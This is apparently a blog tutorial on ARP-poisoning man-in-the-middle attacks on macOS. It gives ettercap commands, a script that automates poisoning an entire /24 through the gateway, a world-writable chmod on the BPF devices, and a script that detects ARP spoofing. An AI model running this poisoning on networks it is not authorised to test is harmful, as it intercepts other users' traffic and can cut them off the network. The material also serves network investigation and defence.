Man in the middle – ARP Poisoning on OSX

At the core of any network investigation is the need to sniff packets. If you have a switch with SPAN (port-mirroring) capabilities then you can listen in from wherever you wish. If for whatever reason that is not practical, a network wiretap may be the answer; the approach below uses ARP poisoning, which is an active attack rather than a passive tap: it tricks the hosts into sending their gateway-bound traffic through your machine, so every targeted host is affected and a mistake can knock them off the network.

On Windows the proverbial Swiss army knife would be "Cain & Abel", but on the Unix side ettercap is the tool of choice.

My platform is currently OSX, so I have added notes on pulling it down from MacPorts (see the previous post for installing the environment).

To install ettercap:

sudo port install ettercap

Assuming that the default gateway on the network is 192.168.2.1, then to tap all traffic leaving the local LAN try the following:

sudo ettercap -T -M arp:remote /192.168.2.1/ /192.168.2.2-99/

Here -T selects the text interface and -M arp:remote selects ARP poisoning between the two target groups, the gateway and the hosts 192.168.2.2-99. The remote flag matters: without it ettercap only sniffs connections between the two groups, with it ettercap also sniffs the hosts' connections to addresses beyond the gateway, which is the point of naming the gateway as a target. Add -i with the interface name (for example en0) if ettercap picks the wrong one. ettercap forwards the intercepted packets itself and restores the victims' ARP caches when you quit cleanly; if it is killed, the victims lose connectivity until their stale ARP entries expire. Note also that ettercap 0.8 added an IPv6 field to the target specification, so on those versions each target takes one more slash; check the TARGET section of the man page for the version you installed.

The BPF capture devices (/dev/bpf*) that Wireshark reads from are accessible only to root by default, so while ettercap runs happily under sudo, Wireshark launched from your normal account cannot open them. To open these devices up for Wireshark:

sudo chmod 666 /dev/bpf*

Bear in mind that this makes the capture devices readable and writable by every user on the machine, and that it does not survive a reboot because /dev is rebuilt; Wireshark's ChmodBPF launch daemon, which limits the devices to the access_bpf group, is the tidier permanent fix.

Now if you fire up Wireshark you will be able to select the relevant interface (the one ettercap is poisoning on) and sniff the traffic.
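The steps above wrapped into one script, as an added example that is not from the original post: it reads the default gateway from the macOS routing table, builds the ettercap target specification in the form the installed version expects, warns if the BPF devices are still root-only, and then runs the poison. It assumes ettercap from MacPorts is on PATH, that ettercap -v prints the version as its second word, that the LAN gateway is the default route, that the LAN is a /24, and that the interface is en0; adjust any of those for your setup.

```shell
#!/bin/sh
# Added example (not the original post's code): wrap the ettercap + Wireshark
# steps into one script for macOS. Assumptions: ettercap on PATH, the LAN
# gateway is the default route, the LAN is a /24, the interface is en0.

# Build the ettercap TARGET spec. Versions before 0.8 use MAC/IPs/PORTs (two
# slashes); 0.8 and later added an IPv6 field, MAC/IPs/IPv6/PORTs (three).
ettercap_targets() {
    gateway=$1
    hosts=$2
    version=$3
    case $version in
        *0.[0-7].*) printf '/%s/ /%s/\n' "$gateway" "$hosts" ;;
        *)          printf '/%s// /%s//\n' "$gateway" "$hosts" ;;
    esac
}

# Host range of the gateway's /24, e.g. 192.168.2.1 -> 192.168.2.2-254
# (assumes a /24; widen or narrow the range for other subnets).
lan_hosts_for() {
    printf '%s\n' "$1" | awk -F. '{ printf "%s.%s.%s.2-254\n", $1, $2, $3 }'
}

# Default gateway as reported by macOS `route -n get default`.
default_gateway() {
    route -n get default | awk '/gateway:/ { print $2 }'
}

# Installed version, e.g. "0.8.3.1" (assumes `ettercap -v` prints
# "ettercap <version> ..." on its first line).
ettercap_version() {
    ettercap -v 2>/dev/null | awk '/^ettercap/ { print $2; exit }'
}

# Wireshark must open the BPF devices; they are root-only by default.
bpf_accessible() {
    [ -r /dev/bpf0 ] && [ -w /dev/bpf0 ]
}

main() {
    gw=$(default_gateway)
    [ -n "$gw" ] || { echo "no default gateway found" >&2; exit 1; }
    spec=$(ettercap_targets "$gw" "$(lan_hosts_for "$gw")" "$(ettercap_version)")
    bpf_accessible || echo "note: /dev/bpf* is not accessible to $(id -un); Wireshark will need ChmodBPF or a chmod" >&2
    echo "running: ettercap -T -i en0 -M arp:remote $spec"
    # $spec is deliberately unquoted: it is two space-separated target arguments.
    sudo ettercap -T -i en0 -M arp:remote $spec
}

# Only start poisoning when explicitly asked ("./mitm.sh run"), so the
# functions above can be sourced and checked without touching the network.
if [ "${1-}" = run ]; then
    main
fi
```

The version branch exists because MacPorts has shipped both 0.7.x (which reports itself as NG-0.7.x) and 0.8.x over the years, and the two disagree on the target syntax; an empty version (ettercap not found) falls through to the modern three-slash form.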

I found that applying an initial filter to ignore duplicate IP address messages makes the view a little clearer.
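Those duplicate-address messages (Wireshark's arp.duplicate-address-detected expert info) are exactly the on-the-wire signature of the poisoning, so the same condition is what you would watch for from the defending side. The following is an added example, not part of the original post: a small detector that reads tcpdump-style ARP lines (as printed by tcpdump -n arp) and reports an IP whose MAC has changed, and a single MAC answering for more than one IP, which is what arp:remote does for the gateway and each victim. The sample log lines are constructed for the example; the attacker MAC de:ad:be:ef:00:01 and the addresses are invented.

```shell
#!/bin/sh
# Added example (not the original post's code): flag the condition behind
# Wireshark's "duplicate use of IP address" warnings, i.e. the on-the-wire
# signature of ARP poisoning, from tcpdump-style ARP lines on stdin.

arp_conflicts() {
    awk '
    /ARP, Reply / {
        # Locate "Reply <ip> is-at <mac>," wherever it sits on the line.
        for (i = 1; i <= NF; i++)
            if ($i == "Reply") { ip = $(i + 1); mac = $(i + 3); break }
        sub(/,$/, "", mac)
        # 1. The MAC answering for a known IP changed: classic poisoning.
        if ((ip in mac_of) && mac_of[ip] != mac)
            printf "%s changed from %s to %s\n", ip, mac_of[ip], mac
        mac_of[ip] = mac
        # 2. One MAC answering for several IPs: arp:remote poisons both
        #    sides (gateway and victim) with the attacker MAC.
        if (!((mac, ip) in claims)) {
            claims[mac, ip] = 1
            if (++n_claims[mac] > 1)
                printf "%s claims %d addresses, latest %s\n", mac, n_claims[mac], ip
        }
    }'
}

# Constructed sample: a legitimate gateway reply, then an attacker at
# de:ad:be:ef:00:01 answering for both the gateway and a victim host.
sample_arp_log() {
    cat <<'EOF'
12:00:00.000001 ARP, Request who-has 192.168.2.1 tell 192.168.2.10, length 28
12:00:00.000250 ARP, Reply 192.168.2.1 is-at 00:11:22:33:44:55, length 28
12:00:05.000001 ARP, Reply 192.168.2.1 is-at de:ad:be:ef:00:01, length 28
12:00:05.000002 ARP, Reply 192.168.2.10 is-at de:ad:be:ef:00:01, length 28
12:00:15.000001 ARP, Reply 192.168.2.1 is-at de:ad:be:ef:00:01, length 28
EOF
}

# Live use (root is needed for the BPF device):
#   sudo tcpdump -l -n -i en0 arp | arp_conflicts
sample_arp_log | arp_conflicts
```

On a switched network a host only sees ARP replies addressed to it or broadcast, so run this on the host you want to protect or, as the opening paragraph says, on a SPAN port; a victim never sees the forged replies ettercap sends to the gateway. Expect benign hits from DHCP reassignments, a replaced NIC, or a box that legitimately owns several addresses, so treat the output as a prompt to check the ARP table rather than as proof.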

Mick